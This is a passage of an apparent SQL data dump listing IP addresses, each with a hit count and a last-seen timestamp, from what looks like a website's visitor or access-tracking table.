('1', '106.215.87.69', 2, '2021-11-21 11:39:41'),
('1', '106.66.19.106', 2, '2021-11-21 09:57:34'),
('1', '106.66.19.85', 1, '2021-11-21 08:56:59'),
('1', '107.181.178.107', 2, '2021-11-22 05:27:56'),
('1', '109.163.216.6', 2, '2021-11-21 11:28:56'),
('1', '109.177.6.82', 1, '2021-11-21 11:05:31'),
('1', '109.191.159.46', 2, '2021-11-04 03:58:36'),
('1', '109.195.198.44', 1, '2021-10-28 09:09:52'),
('1', '109.219.98.207', 12, '2022-02-23 21:10:02'),
('1', '109.235.111.40', 2, '2021-11-04 00:00:56'),
('1', '109.242.233.144', 1, '2021-11-22 22:41:28'),
('1', '109.252.118.208', 1, '2021-11-22 18:12:39'),
('1', '109.252.138.226', 1, '2021-11-21 15:21:25'),
('1', '109.60.140.216', 1, '2021-11-22 11:23:58'),
('1', '109.64.172.115', 1, '2021-11-22 19:29:48'),
('1', '110.136.216.64', 2, '2021-11-21 15:47:27'),
('1', '110.169.31.245', 1, '2021-10-30 04:45:11'),
('1', '110.169.32.5', 12, '2021-12-31 16:41:00'),
('1', '110.227.55.47', 1, '2021-11-01 04:59:34'),
('1', '110.235.247.136', 1, '2021-11-22 09:02:03'),
('1', '110.34.10.243', 12, '2022-03-27 13:24:27'),
('1', '110.39.1.174', 1, '2021-11-22 22:28:27'),
('1', '110.54.167.146', 1, '2021-11-22 03:25:10'),
('1', '110.54.234.108', 2, '2021-11-21 15:46:18'),
('1', '110.54.244.85', 2, '2021-11-22 08:37:34'),
('1', '110.77.161.206', 12, '2022-03-06 21:51:37'),
('1', '110.78.186.62', 10, '2021-04-29 01:29:15'),
('1', '111.88.229.1', 1, '2021-11-22 19:57:19'),
('1', '111.92.81.187', 1, '2021-11-23 05:51:37'),
('1', '111.94.46.169', 1, '2021-11-23 02:07:12'),
('1', '111.95.216.185', 6, '2024-09-22 17:29:26'),
('1', '111.95.219.126', 2, '2021-11-22 05:58:47'),
('1', '112.133.244.32', 1, '2021-11-02 01:10:19'),
('1', '112.133.244.34', 3, '2021-11-23 03:34:58'),
('1', '112.134.138.61', 1, '2021-11-22 17:20:43'),
('1', '112.196.133.254', 2, '2021-11-22 15:05:30'),
('1', '112.196.36.139', 2, '2021-11-01 09:37:35'),
('1', '112.197.177.88', 2, '2021-11-22 03:04:40'),
('1', '112.201.246.118', 5, '2021-11-02 07:23:54'),
('1', '112.209.17.129', 1, '2021-11-04 10:26:52'),
('1', '112.209.219.121', 1, '2021-11-23 05:53:15'),
('1', '112.211.5.37', 1, '2021-10-30 11:01:47'),
('1', '112.31.42.46', 2, '2022-02-13 06:16:51'),
('1', '112.31.63.89', 10, '2021-06-05 17:46:14'),
('1', '112.78.129.34', 3, '2021-11-23 04:32:08'),
('1', '113.170.65.192', 2, '2021-11-21 14:23:39'),
('1', '113.186.235.35', 5, '2021-11-23 06:07:13'),
('1', '114.108.224.7', 1, '2021-11-22 08:18:29'),
('1', '114.122.134.74', 1, '2021-11-21 15:24:00'),
('1', '114.122.207.205', 1, '2021-11-22 10:41:25'),
('1', '114.134.20.102', 3, '2021-11-23 07:30:57'),
('1', '114.142.168.37', 1, '2021-11-22 04:24:05'),
('1', '114.142.169.44', 1, '2021-11-22 02:32:55'),
('1', '114.142.170.10', 1, '2021-11-23 01:40:32'),
('1', '114.142.170.40', 1, '2021-11-22 03:25:00'),
('1', '114.143.119.174', 1, '2021-11-22 11:20:03'),
('1', '114.5.111.251', 1, '2021-11-03 02:54:13'),
('1', '114.5.213.231', 1, '2021-11-01 13:26:48'),
('1', '115.135.244.12', 2, '2021-11-22 10:28:29'),
('1', '115.147.11.66', 3, '2021-11-03 08:18:14'),
('1', '115.147.29.222', 1, '2021-11-22 05:07:42'),
('1', '115.186.119.103', 2, '2021-11-22 18:48:44'),
('1', '115.30.10.190', 2, '2022-02-12 05:27:17'),
('1', '115.73.213.31', 10, '2022-07-20 04:58:59'),
('1', '115.84.117.213', 1, '2021-11-04 02:46:04'),
('1', '115.84.74.191', 4, '2021-11-01 23:39:46'),
('1', '115.84.82.73', 1, '2021-11-22 10:14:52'),
('1', '116.15.233.40', 2, '2021-11-23 07:36:00'),
('1', '116.15.246.77', 4, '2021-11-23 02:45:56'),
('1', '116.206.164.130', 1, '2021-11-22 18:54:04'),
('1', '116.206.192.99', 1, '2021-11-01 09:14:33'),
('1', '116.206.35.30', 1, '2021-11-22 02:38:29'),
('1', '116.43.83.215', 1, '2021-11-22 15:39:20'),
('1', '116.75.18.47', 6, '2021-11-23 03:33:03'),
('1', '116.90.116.38', 2, '2021-11-21 18:11:09'),
('1', '116.99.123.3', 1, '2021-11-21 09:04:37'),
('1', '117.194.129.193', 1, '2021-11-22 15:30:15'),
('1', '117.196.75.92', 1, '2021-11-22 04:04:31'),
('1', '117.214.76.75', 1, '2021-11-22 10:34:27'),
('1', '117.223.68.201', 1, '2021-11-21 08:37:44'),
('1', '117.98.216.198', 1, '2021-11-22 14:54:14'),
('1', '118.103.255.51', 1, '2021-11-01 15:05:02'),
('1', '118.136.37.23', 5, '2021-11-22 23:53:16'),
('1', '118.179.43.20', 2, '2021-06-07 13:15:14'),
('1', '119.10.177.170', 3, '2021-11-03 13:36:53'),
('1', '119.152.59.87', 2, '2021-10-30 14:35:09'),
('1', '119.160.102.6', 1, '2021-11-21 15:02:44'),
('1', '119.160.97.151', 1, '2021-11-21 17:51:46'),
('1', '119.235.54.115', 1, '2021-11-21 13:04:55'),
('1', '119.73.113.58', 1, '2021-11-21 10:32:55'),
('1', '119.76.134.190', 1, '2022-02-12 14:34:50'),
('1', '119.94.69.56', 4, '2021-11-22 15:35:32'),
('1', '12.188.54.30', 10, '2021-04-26 22:19:19'),
('1', '120.138.114.161', 2, '2022-08-15 15:45:02'),
('1', '120.197.62.9', 2, '2022-02-13 06:15:41'),
('1', '120.28.245.29', 1, '2021-11-22 04:11:30'),
('1', '120.29.76.124', 1, '2021-11-22 17:25:03'),
('1', '121.101.246.203', 2, '2022-02-13 06:14:55'),
('1', '121.122.98.247', 4, '2021-10-30 05:07:06'),
('1', '122.161.242.144', 1, '2021-11-01 11:32:44'),
('1', '122.161.243.106', 1, '2021-10-27 08:59:35'),
('1', '122.161.243.83', 2, '2021-10-28 12:55:25'),
('1', '122.161.245.35', 2, '2021-11-02 08:29:48'),
('1', '122.169.152.137', 1, '2021-11-22 02:47:01'),
('1', '122.169.54.249', 1, '2021-11-22 05:39:34'),
('1', '122.173.31.179', 2, '2021-11-02 11:11:21'),
('1', '122.177.101.197', 4, '2021-11-23 01:37:22'),
('1', '122.177.107.108', 1, '2021-11-22 08:51:34'),
('1', '122.181.113.216', 1, '2021-11-21 12:29:50'),
('1', '122.182.203.36', 1, '2021-11-22 19:08:38'),
('1', '122.2.20.18', 1, '2021-11-23 05:45:33'),
('1', '122.53.57.33', 1, '2022-08-23 06:02:53'),
('1', '123.20.191.66', 2, '2021-11-23 01:50:31'),
('1', '123.22.92.193', 10, '2022-05-05 22:25:59'),
('1', '123.231.104.100', 2, '2021-11-03 16:46:58'),
('1', '123.231.106.5', 1, '2021-11-21 11:38:36'),
('1', '123.231.126.133', 1, '2021-11-01 09:19:20'),
('1', '123.253.233.41', 1, '2021-11-21 17:43:57'),
('1', '123.253.235.205', 1, '2021-10-28 12:31:18'),
('1', '124.120.25.82', 1, '2021-11-22 06:09:46'),
('1', '124.120.31.207', 1, '2021-11-22 08:34:38'),
('1', '124.120.66.186', 1, '2021-11-01 05:04:34'),
('1', '124.120.68.229', 1, '2021-11-03 12:56:59'),
('1', '124.122.17.184', 2, '2021-11-21 15:44:13'),
('1', '124.122.226.143', 2, '2021-10-30 19:42:31'),
('1', '124.158.186.199', 6, '2024-09-28 19:22:34'),
('1', '124.82.90.77', 3, '2021-11-03 06:50:20'),
('1', '125.131.22.121', 2, '2022-02-12 05:28:15'),
('1', '125.162.211.114', 4, '2021-11-04 02:03:13'),
('1', '125.162.213.221', 1, '2021-10-30 10:53:34'),
('1', '125.162.214.96', 7, '2024-05-15 19:20:00'),
('1', '125.164.113.70', 1, '2021-11-22 09:05:27'),
('1', '125.164.15.69', 1, '2021-11-04 08:50:02'),
('1', '125.164.234.86', 4, '2021-11-22 19:39:40'),
('1', '125.164.92.204', 3, '2021-11-22 17:22:29'),
('1', '125.227.136.6', 3, '2021-11-22 17:54:21'),
('1', '125.69.151.2', 5, '2022-06-04 23:09:38'),
('1', '128.116.185.119', 1, '2021-11-01 09:38:54'),
('1', '129.205.113.15', 1, '2021-10-30 11:41:34'),
('1', '130.0.34.218', 1, '2021-11-02 20:12:07'),
('1', '130.105.200.82', 1, '2021-11-23 06:34:01'),
('1', '130.105.219.150', 1, '2021-11-21 23:26:07'),
('1', '130.12.180.15', 4213, '2026-02-25 16:24:59'),
('1', '130.204.126.74', 1, '2021-11-21 10:29:03'),
('1', '130.25.169.117', 2, '2022-02-13 06:16:26'),
('1', '131.226.65.117', 2, '2021-11-21 19:16:07'),
('1', '132.154.12.111', 1, '2021-11-21 11:51:12'),
('1', '132.255.58.207', 1, '2021-11-21 14:37:15'),
('1', '135.125.203.10', 2, '2021-11-22 19:20:00'),
('1', '136.0.251.127', 1, '2026-04-03 13:53:39'),
('1', '136.158.10.180', 1, '2021-11-21 10:29:41'),
('1', '136.158.103.20', 1, '2021-11-22 05:55:16'),
('1', '136.158.122.190', 1, '2021-11-21 14:47:37'),
('1', '136.185.238.7', 1, '2021-11-22 05:18:41'),
('1', '138.255.188.242', 1, '2021-10-30 16:02:27'),
('1', '138.59.207.16', 1, '2025-01-21 22:45:37'),
('1', '139.167.208.136', 1, '2021-11-02 16:32:40'),
('1', '139.167.223.86', 1, '2021-11-04 05:09:12'),
('1', '139.195.97.161', 1, '2021-11-22 05:56:06'),
('1', '139.5.242.229', 1, '2021-11-21 19:10:29'),
('1', '139.59.147.79', 1, '2021-11-22 04:52:45'),
('1', '14.102.101.66', 1, '2021-11-22 05:56:59'),
('1', '14.12.49.96', 2, '2021-11-22 15:34:00'),
('1', '14.161.24.171', 2, '2022-08-06 12:53:05'),
('1', '14.162.135.39', 12, '2022-04-02 08:04:59'),
('1', '14.163.77.171', 2, '2021-11-02 21:15:08'),
('1', '14.169.176.239', 12, '2022-04-23 00:05:41'),
('1', '14.175.157.219', 2, '2021-11-22 05:09:59'),
('1', '14.175.252.223', 1, '2021-11-23 05:38:56'),
('1', '14.185.187.68', 4, '2021-11-22 11:38:32'),
('1', '14.192.217.100', 2, '2021-11-22 10:04:00'),
('1', '14.192.217.155', 2, '2021-11-23 01:03:11'),
('1', '14.192.220.167', 1, '2021-11-21 09:10:31'),
('1', '14.232.7.37', 12, '2022-01-12 14:43:11'),
('1', '14.232.85.50', 10, '2021-05-27 14:50:41'),
('1', '14.234.40.161', 1, '2021-11-22 13:46:14'),
('1', '140.213.227.188', 1, '2021-11-21 12:01:09'),
('1', '141.136.91.91', 3, '2021-11-21 17:25:31'),
('1', '141.98.82.3', 812, '2024-07-05 03:13:00'),
('1', '146.102.120.105', 1, '2021-11-01 15:52:47'),
('1', '146.196.44.174', 1, '2021-11-22 05:02:18'),
('1', '146.196.45.42', 1, '2021-11-23 04:27:39'),
('1', '146.255.235.246', 3, '2021-11-02 08:34:47'),
('1', '146.70.80.79', 2, '2024-03-28 08:26:56'),
('1', '146.70.80.81', 2, '2024-03-12 15:33:40'),
('1', '147.10.79.70', 2, '2021-11-23 05:32:45'),
('1', '147.75.117.50', 18, '2022-07-30 13:17:30'),
('1', '147.78.66.156', 1, '2023-10-10 21:26:11'),
('1', '149.18.28.76', 1, '2024-02-27 05:09:37'),
('1', '149.200.130.70', 1, '2021-11-21 17:48:28'),
('1', '149.200.188.115', 1, '2021-11-22 19:34:28'),
('1', '149.36.49.196', 76, '2023-08-15 09:34:36'),
('1', '150.129.66.1', 1, '2021-11-23 07:48:00'),
('1', '151.49.44.253', 1, '2021-11-21 14:33:34'),
('1', '151.72.93.5', 1, '2021-11-21 14:12:49'),
('1', '152.166.249.29', 5, '2021-11-22 19:47:58'),
('1', '154.127.150.204', 3, '2021-11-22 11:33:25'),
('1', '154.127.203.81', 1, '2021-11-21 14:53:03'),
('1', '154.160.20.228', 1, '2021-11-23 01:06:07'),
('1', '154.160.3.71', 1, '2021-10-28 12:25:54'),
('1', '154.177.53.166', 1, '2021-11-22 19:18:23'),
('1', '154.178.25.79', 1, '2021-11-21 17:37:36'),
('1', '154.192.16.163', 1, '2021-11-04 10:08:29'),
('1', '154.216.16.155', 1, '2024-11-13 16:22:00'),
('1', '154.238.105.74', 1, '2021-11-22 17:18:36'),
('1', '154.68.5.134', 2, '2021-10-28 12:02:18'),
('1', '154.72.162.34', 1, '2021-11-02 16:24:51'),
('1', '154.72.83.214', 1, '2024-10-18 10:24:29'),
('1', '156.199.209.136', 2, '2021-11-21 19:22:32'),
('1', '156.209.212.110', 1, '2021-11-21 12:00:57'),
('1', '156.215.36.89', 1, '2021-11-22 21:45:51'),
('1', '156.216.168.45', 1, '2021-11-01 16:28:52'),
('1', '156.217.19.23', 1, '2021-11-21 12:57:16'),
('1', '156.221.166.253', 2, '2021-11-23 03:39:36'),
('1', '157.100.170.30', 1, '2021-11-22 21:51:55'),
('1', '157.100.74.167', 1, '2021-11-22 15:10:16'),
('1', '157.100.75.190', 3, '2021-11-21 19:54:09'),
('1', '157.119.80.194', 1, '2021-11-02 07:46:24'),
('1', '157.119.80.255', 1, '2021-11-04 10:02:26'),
('1', '157.33.73.165', 1, '2021-10-30 17:14:20'),
('1', '157.38.53.55', 1, '2021-11-01 15:23:24'),
('1', '157.47.246.241', 1, '2021-11-21 13:41:34'),
('1', '157.51.89.66', 1, '2021-11-22 14:52:12'),
('1', '159.253.120.5', 2, '2024-03-06 08:37:17'),
('1', '160.120.12.100', 6, '2021-11-22 08:21:17'),
('1', '160.155.142.130', 2, '2021-11-22 00:49:22'),
('1', '160.174.130.152', 2, '2021-11-22 05:45:36'),
('1', '160.176.136.116', 2, '2021-11-03 17:21:44'),
('1', '160.176.17.27', 1, '2021-11-22 09:07:26'),
('1', '161.18.220.55', 1, '2021-11-02 21:22:54'),
('1', '161.35.59.106', 2, '2021-11-30 12:45:39'),
('1', '162.14.114.56', 2, '2022-08-14 02:31:52'),
('1', '162.253.68.117', 1, '2021-11-22 11:43:06'),
('1', '167.56.85.238', 1, '2021-11-01 07:00:23'),
('1', '168.121.179.208', 1, '2021-11-21 18:31:45'),
('1', '168.194.0.55', 1, '2021-11-04 09:10:55'),
('1', '168.196.234.37', 2, '2021-11-22 19:28:14'),
('1', '168.197.221.40', 1, '2021-10-28 11:57:45'),
('1', '168.232.27.163', 5, '2024-09-17 12:19:45'),
('1', '169.239.193.51', 3, '2021-11-21 18:13:17'),
('1', '170.231.122.128', 1, '2021-11-22 15:31:37'),
('1', '170.83.122.246', 1, '2021-10-28 08:01:45'),
('1', '170.84.9.162', 6, '2021-11-23 02:10:13'),
('1', '171.100.190.116', 5, '2021-11-22 17:45:35'),
('1', '171.251.238.143', 1, '2021-11-23 01:48:17'),
('1', '171.4.226.191', 3, '2021-11-22 22:45:08'),
('1', '171.6.246.78', 2, '2021-11-21 14:38:34'),
('1', '171.61.5.2', 1, '2021-11-21 13:37:26'),
('1', '171.96.90.7', 4, '2021-11-23 03:54:37'),
('1', '172.93.213.157', 2, '2023-12-12 04:13:51'),
('1', '174.138.29.248', 1, '2021-10-26 06:09:39'),
('1', '175.125.75.125', 2, '2021-11-22 10:47:01'),
('1', '175.139.77.54', 1, '2021-11-21 08:58:20'),
('1', '175.140.119.169', 2, '2021-11-21 12:09:38'),
('1', '175.157.43.48', 1, '2021-11-02 16:02:27'),
('1', '175.29.177.187', 3, '2021-11-22 10:15:37'),
('1', '175.6.103.113', 18, '2022-08-28 04:35:28'),
('1', '176.123.2.160', 2, '2024-02-05 02:47:53'),
('1', '176.125.42.247', 1, '2021-11-22 10:22:44'),
('1', '176.203.201.8', 2, '2021-11-22 15:38:37'),
('1', '176.213.145.101', 1, '2021-11-03 13:53:57'),
('1', '176.215.10.207', 7, '2021-11-04 10:18:11'),
('1', '176.221.104.26', 2, '2021-11-03 17:29:16'),
('1', '176.234.8.161', 1, '2021-10-28 08:51:58'),
('1', '176.234.9.62', 3, '2021-11-03 15:29:51'),
('1', '176.36.89.231', 6, '2021-11-23 02:30:25'),
('1', '176.37.179.250', 3, '2021-11-04 10:17:00'),
('1', '176.52.96.182', 1, '2021-11-04 03:46:50'),
('1', '176.57.8.107', 4, '2021-11-22 21:55:05'),
('1', '176.59.21.23', 1, '2021-11-03 11:42:01'),
('1', '176.59.44.61', 1, '2021-11-02 07:12:20'),
('1', '177.104.8.39', 1, '2021-11-03 01:26:05'),
('1', '177.106.146.254', 12, '2022-04-16 06:35:51'),
('1', '177.11.94.12', 1, '2021-11-01 10:36:32'),
('1', '177.184.110.229', 1, '2021-11-21 16:01:34'),
('1', '177.190.209.197', 1, '2021-11-02 15:42:34'),
('1', '177.191.152.19', 1, '2021-11-22 15:33:13'),
('1', '177.204.161.128', 1, '2021-11-22 19:50:07'),
('1', '177.22.243.48', 1, '2021-11-21 11:32:49'),
('1', '177.222.112.47', 1, '2021-11-23 01:22:32'),
('1', '177.240.139.94', 2, '2021-11-22 21:39:12'),
('1', '177.37.249.61', 1, '2021-10-28 13:14:11'),
('1', '177.73.71.212', 4, '2021-11-21 08:53:53'),
('1', '178.135.0.151', 1, '2021-11-21 20:51:46'),
('1', '178.135.1.164', 1, '2021-11-22 18:35:11'),
('1', '178.135.9.205', 1, '2021-11-22 15:24:34'),
('1', '178.138.33.186', 1, '2021-10-28 08:54:22'),
('1', '178.138.33.81', 2, '2021-11-01 10:49:20'),
('1', '178.176.166.108', 1, '2021-11-03 06:56:18'),
('1', '178.200.92.166', 3, '2021-11-21 13:22:38'),
('1', '178.205.130.253', 1, '2021-11-22 11:36:04'),
('1', '178.210.243.235', 6, '2021-11-03 23:39:59'),
('1', '178.213.191.68', 3, '2021-11-01 16:13:28'),
('1', '178.216.174.144', 1, '2021-11-03 15:55:00'),
('1', '178.220.213.22', 1, '2021-11-22 18:45:30'),
('1', '178.35.130.213', 1, '2021-11-01 18:40:57'),
('1', '178.36.195.43', 3, '2021-11-23 06:31:58'),
('1', '178.48.116.162', 1, '2021-11-21 16:36:42'),
('1', '178.61.158.209', 2, '2021-11-22 18:46:10'),
('1', '178.67.168.28', 2, '2021-11-03 13:28:58'),
('1', '178.67.173.103', 1, '2021-11-21 11:07:35'),
('1', '178.80.95.76', 1, '2021-11-21 16:41:41'),
('1', '179.104.164.199', 2, '2022-02-12 05:27:34'),
('1', '179.192.136.103', 1, '2021-11-22 19:16:55'),
('1', '179.193.206.245', 1, '2021-11-01 20:07:16'),
('1', '179.218.1.84', 1, '2021-11-21 13:12:18'),
('1', '179.27.215.14', 1, '2021-11-21 11:32:37'),
('1', '179.57.218.162', 1, '2021-11-01 14:25:06'),
('1', '179.6.200.186', 1, '2021-11-23 02:28:50'),
('1', '179.6.223.158', 1, '2021-11-22 14:26:39'),
('1', '179.6.56.163', 2, '2021-11-03 16:38:59'),
('1', '180.178.141.18', 2, '2021-11-22 17:37:25'),
('1', '180.178.149.254', 1, '2021-11-22 15:47:15'),
('1', '180.178.153.178', 1, '2021-11-22 17:22:46'),
('1', '180.190.115.236', 1, '2021-11-03 16:07:08'),
('1', '180.190.211.58', 1, '2021-11-23 02:43:56'),
('1', '180.241.205.158', 1, '2021-11-21 10:01:02'),
('1', '180.241.45.223', 1, '2021-11-21 22:14:41'),
('1', '180.243.10.66', 3, '2021-11-21 17:43:59'),
('1', '180.244.161.122', 1, '2021-11-22 09:55:07'),
('1', '180.246.18.70', 2, '2021-11-22 01:10:21'),
('1', '180.249.175.228', 3, '2021-11-21 19:46:02'),
('1', '180.251.217.203', 1, '2021-11-21 08:45:58'),
('1', '180.252.150.40', 2, '2021-11-23 03:08:54'),
('1', '180.252.48.191', 1, '2024-09-07 02:22:10'),
('1', '180.253.163.211', 1, '2021-11-22 19:20:13'),
('1', '180.253.239.93', 1, '2021-11-22 05:46:40'),
('1', '180.254.161.71', 1, '2021-11-04 04:55:32'),
('1', '180.92.152.42', 1, '2021-11-21 12:49:50'),
('1', '181.115.161.45', 3, '2021-11-22 17:51:29'),
('1', '181.115.59.114', 4, '2021-11-22 18:13:16'),
('1', '181.118.45.213', 1, '2021-11-21 16:26:54'),
('1', '181.135.162.199', 1, '2021-11-21 19:54:35'),
('1', '181.177.14.148', 1, '2021-11-03 18:20:34'),
('1', '181.196.73.227', 1, '2021-11-22 15:11:56'),
('1', '181.221.188.80', 2, '2021-11-22 19:16:20'),
('1', '181.222.166.177', 1, '2021-11-01 14:20:11'),
('1', '181.224.124.186', 1, '2021-11-22 02:13:39'),
('1', '181.231.140.88', 1, '2021-11-21 20:02:07'),
('1', '181.235.60.195', 2, '2021-11-03 11:46:27'),
('1', '181.43.150.158', 3, '2021-11-04 02:58:25'),
('1', '181.43.243.94', 1, '2021-10-28 15:26:31'),
('1', '181.55.68.9', 3, '2021-11-23 00:41:32'),
('1', '181.64.150.91', 1, '2021-11-21 23:52:26'),
('1', '181.64.64.10', 1, '2021-11-01 20:53:39'),
('1', '181.66.177.34', 1, '2021-11-21 14:48:44'),
('1', '181.66.223.146', 2, '2021-11-01 21:04:52'),
('1', '181.78.4.253', 1, '2021-11-22 05:16:20'),
('1', '181.91.137.41', 10, '2024-05-15 19:22:49'),
('1', '182.184.75.108', 1, '2021-11-22 10:32:26'),
('1', '182.189.192.176', 1, '2021-11-21 14:52:40'),
('1', '182.189.193.159', 3, '2021-11-22 17:19:13'),
('1', '182.189.194.211', 2, '2021-11-03 15:28:46'),
('1', '182.189.8.205', 1, '2021-11-21 13:50:00'),
('1', '182.190.218.11', 1, '2021-11-21 14:30:10'),
('1', '182.232.121.154', 2, '2021-11-21 19:24:39'),
('1', '182.253.122.142', 1, '2024-10-21 19:10:02'),
('1', '182.253.194.44', 1, '2021-11-22 06:41:57'),
('1', '182.53.246.236', 1, '2021-11-23 02:20:32'),
('1', '182.72.66.90', 5, '2021-11-02 09:14:26'),
('1', '182.77.35.21', 3, '2021-10-28 16:21:07'),
('1', '183.171.26.85', 1, '2021-11-04 10:02:31'),
('1', '183.182.111.157', 1, '2021-11-04 06:35:46'),
('1', '183.182.111.237', 2, '2021-11-03 05:34:48'),
('1', '183.182.123.95', 1, '2021-11-21 19:49:34'),
('1', '183.232.32.178', 5, '2022-04-03 02:37:12'),
('1', '183.80.36.49', 1, '2021-11-21 13:15:16'),
('1', '183.82.207.146', 3, '2021-11-21 12:34:29'),
('1', '183.89.47.27', 1, '2021-11-04 03:52:33'),
('1', '184.22.193.27', 2, '2021-11-02 06:27:49'),
('1', '184.22.71.55', 1, '2021-11-21 23:44:42'),
('1', '185.12.225.197', 1, '2021-11-01 08:02:03'),
('1', '185.133.226.114', 1, '2021-11-22 18:14:12'),
('1', '185.136.135.232', 4, '2021-11-22 18:39:52'),
('1', '185.140.160.229', 1, '2021-10-28 09:28:48'),
('1', '185.142.238.138', 2, '2023-11-24 01:23:40'),
('1', '185.147.125.11', 496, '2025-03-08 12:40:20'),
('1', '185.152.64.187', 2, '2021-11-01 19:15:31'),
('1', '185.165.171.84', 2, '2026-04-30 22:05:53'),
('1', '185.177.190.204', 4, '2021-11-02 16:49:16'),
('1', '185.177.190.206', 2, '2021-11-21 14:55:06'),
('1', '185.18.112.158', 3, '2021-11-22 22:30:12'),
('1', '185.183.33.119', 1, '2025-09-18 21:39:53'),
('1', '185.186.81.72', 1, '2021-11-21 16:39:15'),
('1', '185.189.127.146', 2, '2021-11-02 10:18:37'),
('1', '185.190.132.196', 1, '2021-11-21 18:40:45'),
('1', '185.195.55.43', 1, '2021-10-30 09:39:46'),
('1', '185.199.102.183', 2, '2024-05-15 19:20:33'),
('1', '185.200.215.238', 1, '2021-11-01 07:15:09'),
('1', '185.205.142.9', 1, '2021-11-23 03:37:15'),
('1', '185.206.248.118', 2, '2024-08-26 07:53:23'),
('1', '185.21.14.193', 7, '2025-11-18 03:11:17'),
('1', '185.212.247.235', 1, '2021-11-03 07:29:51'),
('1', '185.220.100.252', 4, '2026-02-27 06:08:42'),
('1', '185.220.101.0', 1, '2024-09-07 02:28:10'),
('1', '185.220.101.156', 1, '2026-01-07 23:05:20'),
('1', '185.220.101.19', 1, '2026-01-03 11:02:31'),
('1', '185.220.101.42', 1, '2026-04-30 04:10:29'),
('1', '185.220.101.67', 1, '2024-09-07 02:24:18'),
('1', '185.220.101.78', 2, '2024-09-07 02:28:25'),
('1', '185.223.189.97', 2, '2021-11-02 06:25:39'),
('1', '185.225.28.230', 602, '2023-10-19 04:34:23'),
('1', '185.229.87.98', 1, '2021-11-04 08:47:03'),
('1', '185.230.126.5', 1, '2021-10-27 12:33:01'),
('1', '185.230.243.193', 3, '2021-11-03 10:46:35'),
('1', '185.230.243.213', 2, '2021-11-02 09:19:18'),
('1', '185.233.26.40', 1, '2021-10-30 11:44:07'),
('1', '185.236.67.174', 2, '2021-11-01 12:29:50'),
('1', '185.241.208.115', 1, '2024-09-07 02:27:53'),
('1', '185.241.208.202', 1, '2024-09-07 02:24:23'),
('1', '185.253.102.180', 1, '2021-11-01 17:25:33'),
('1', '185.46.197.27', 3, '2021-11-22 11:26:45'),
('1', '185.54.228.26', 1, '2021-11-22 11:50:13'),
('1', '185.77.220.28', 1, '2024-02-23 02:50:26'),
('1', '185.8.5.210', 1, '2021-10-27 09:03:21'),
('1', '185.81.167.242', 2, '2023-12-02 06:52:09'),
('1', '185.89.86.26', 2, '2021-11-22 13:53:32'),
('1', '186.185.144.51', 1, '2021-10-28 15:16:23'),
('1', '186.236.195.197', 32, '2024-05-15 19:22:07'),
('1', '186.42.18.135', 2, '2021-11-21 13:52:11'),
('1', '186.42.18.175', 2, '2021-11-22 21:41:01'),
('1', '186.71.212.237', 1, '2021-11-02 06:08:49'),
('1', '186.88.75.106', 1, '2021-11-23 00:22:43'),
('1', '186.88.79.215', 2, '2021-11-23 00:45:33'),
('1', '186.88.90.12', 2, '2021-11-03 21:02:05'),
('1', '186.88.95.204', 1, '2021-10-27 10:37:56'),
('1', '186.93.14.121', 1, '2021-11-04 01:36:12'),
('1', '186.93.17.102', 1, '2021-11-02 01:59:26'),
('1', '186.93.234.135', 3, '2021-11-22 21:41:30'),
('1', '186.93.238.159', 4, '2021-11-22 22:37:14'),
('1', '186.93.4.184', 1, '2021-11-22 22:35:01'),
('1', '186.94.155.17', 3, '2021-11-22 04:55:08'),
('1', '186.94.51.122', 1, '2021-11-21 19:05:11'),
('1', '187.108.194.152', 14, '2022-07-20 17:28:39'),
('1', '187.112.140.77', 2, '2021-11-02 15:24:54'),
('1', '187.143.35.177', 1, '2021-11-21 17:13:14'),
('1', '187.189.52.26', 12, '2021-05-12 07:48:26'),
('1', '187.19.169.34', 1, '2024-05-16 21:59:34'),
('1', '187.190.73.37', 4, '2021-11-23 00:26:59'),
('1', '187.237.41.45', 1, '2021-11-22 17:45:50'),
('1', '187.3.216.165', 1, '2021-11-22 01:14:11'),
('1', '187.36.173.215', 1, '2021-11-22 00:49:52'),
('1', '187.60.32.27', 1, '2021-11-21 17:23:03'),
('1', '187.93.53.10', 2, '2022-03-14 05:33:57'),
('1', '188.161.124.94', 1, '2021-11-21 21:57:22'),
('1', '188.161.166.82', 2, '2021-11-22 11:23:27'),
('1', '188.163.12.78', 2, '2021-11-21 16:23:41'),
('1', '188.163.88.123', 3, '2021-11-02 09:39:01'),
('1', '188.187.192.150', 1, '2021-11-22 10:35:18'),
('1', '188.237.47.88', 1, '2021-11-21 12:46:34'),
('1', '188.243.183.240', 3, '2021-11-21 11:22:44'),
('1', '188.3.173.97', 1, '2021-11-22 17:49:31'),
('1', '188.94.235.105', 1, '2021-11-21 12:19:40'),
('1', '189.109.239.46', 12, '2022-01-14 01:51:42'),
('1', '189.112.40.206', 12, '2022-05-14 01:55:27'),
('1', '189.203.27.24', 1, '2021-11-23 01:02:25'),
('1', '189.223.55.195', 4, '2021-11-22 18:41:08'),
('1', '189.240.39.243', 12, '2021-06-12 03:04:45'),
('1', '189.31.8.23', 2, '2021-11-03 18:54:53'),
('1', '189.56.143.106', 4, '2022-03-21 09:40:12'),
('1', '189.76.195.65', 1, '2021-11-22 19:11:54'),
('1', '189.76.195.77', 1, '2021-11-03 19:52:16'),
('1', '189.76.195.92', 1, '2021-10-27 12:50:38'),
('1', '190.103.233.196', 1, '2021-11-22 03:06:59'),
('1', '190.115.3.114', 1, '2021-11-22 17:47:28'),
('1', '190.115.67.157', 2, '2021-11-01 23:22:17'),
('1', '190.121.1.131', 1, '2021-11-22 18:50:53'),
('1', '190.131.42.76', 3, '2021-11-22 18:04:37'),
('1', '190.141.22.213', 1, '2021-11-23 00:48:08'),
('1', '190.178.85.210', 9, '2021-11-23 00:33:05'),
('1', '190.186.130.4', 1, '2021-10-30 11:01:02'),
('1', '190.191.15.237', 1, '2021-11-21 19:41:47'),
('1', '190.198.91.238', 1, '2021-11-21 15:28:22'),
('1', '190.203.99.238', 2, '2021-11-22 18:41:48'),
('1', '190.205.164.170', 2, '2021-11-22 17:11:40'),
('1', '190.214.123.111', 2, '2021-11-22 21:44:22'),
('1', '190.232.27.21', 1, '2021-11-23 00:37:37'),
('1', '190.234.92.70', 1, '2021-11-21 23:12:51'),
('1', '190.236.198.22', 1, '2021-10-27 12:53:04'),
('1', '190.237.169.70', 1, '2021-11-21 14:46:36'),
('1', '190.238.82.109', 1, '2021-10-30 04:42:32'),
('1', '190.239.58.153', 2, '2021-11-23 00:35:19'),
('1', '190.33.18.92', 1, '2021-11-22 17:16:40'),
